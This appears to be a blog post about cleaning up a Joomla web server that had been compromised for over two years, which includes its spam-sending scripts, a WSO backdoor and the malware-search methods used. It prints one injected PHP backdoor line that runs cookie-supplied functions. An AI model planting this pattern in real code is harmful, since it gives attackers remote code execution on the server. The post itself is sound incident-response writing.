‘The Webpage is done sir, thank you for doing business with us.’

Got hacked..

Some time ago, I was contacted by a friend. He had a problem. One of his customer’s web-server were compromised. There was an issue with the outgoing e-mails.

The ISP stopped all outgoing email from the domain. With the amount of spam sent out, the ISP could get blacklisted.

This was not good for the customer. They were dependent on e-mail. They might suffer financial loss.

They were using Joomla CMS. The website had not been updated in about two years. I said this is something you will need to fix. You need to take a look and clean up the mess. I got a go.

 

Finding clues..

The root web-directory listed over 65.000 files.

We had an outdated Joomla, several outdated Joomla plugins, outdated dependencies for the plugins, customized pages. And a deprecated version of PHP running on an old server.

Finding all the malicious code was not easy. First. What script was responsible for the large bulks of outgoing emails ?

The ISP stated that it was the malicious script ‘list37.php’ and ‘utf58.php’. These files was deleted.

Secondly we did some manual searches on the files. And we got some nasty looking code. The most effective results came from searching for ‘base64_decode()’ and ‘eval()’.

We found a PHP RCE script dated back to Mars 2014. So the web-server has been owned for over two years.

–Example. Running copy of the website. Perl backdoor installed from a RCE.

 

Joomla log-folder stated 75.000 failed login attempts. Moving on.

There were probably also passwords stored in plain-text inside the web-directory. Database credentials was definitively compromised. There were no logs dated from before the compromise was discovered. To pin exactly where the intruders got in was hard. Probably it was the outdated Joomla.

 

Obfuscated…

After all the manual searches, the program ‘php-malware-finder’ was very helpful. https://github.com/nbs-system

By running it we found about 20 malware scripts. Mass-mailers, small RCE’s and a file uploader were found in various sub-folders.

The filenames was casual like ‘configure.php’, ‘images.php’, ‘cache_db.php’, ‘license.php’, ‘list5.php’, ‘widget-links-info.php’, ‘test.php’ and ‘blog.php’.

The biggest we found was ‘WSO BACKDOOR’.

–WSO backdoor. Some work.

 

There were also an injected line of code found in various legitimate files:

if(@$_COOKIE[‘drqmnf’]){$cfkwl=$_COOKIE[‘drqmnf’](“”,@$_COOKIE[‘suirwk’](@$_COOKIE[‘yguyyv’]));$cfkwl();}

 

Any (php) file could be compromised. Though it would be harder to find them if they were not obfuscated.

–Typical base64 encoded string. String containing the malicious php code.

 

The financial side..

System administration is a continuing process of monitoring, deploying updates, reading change-logs, troubleshoot, modify, reading security bulletins and fixing errors. The costs with a compromised system is far more than hiring someone to look after it on a permanently basis.

Do not say ‘The Webpage is done sir, thank you for doing business with us.’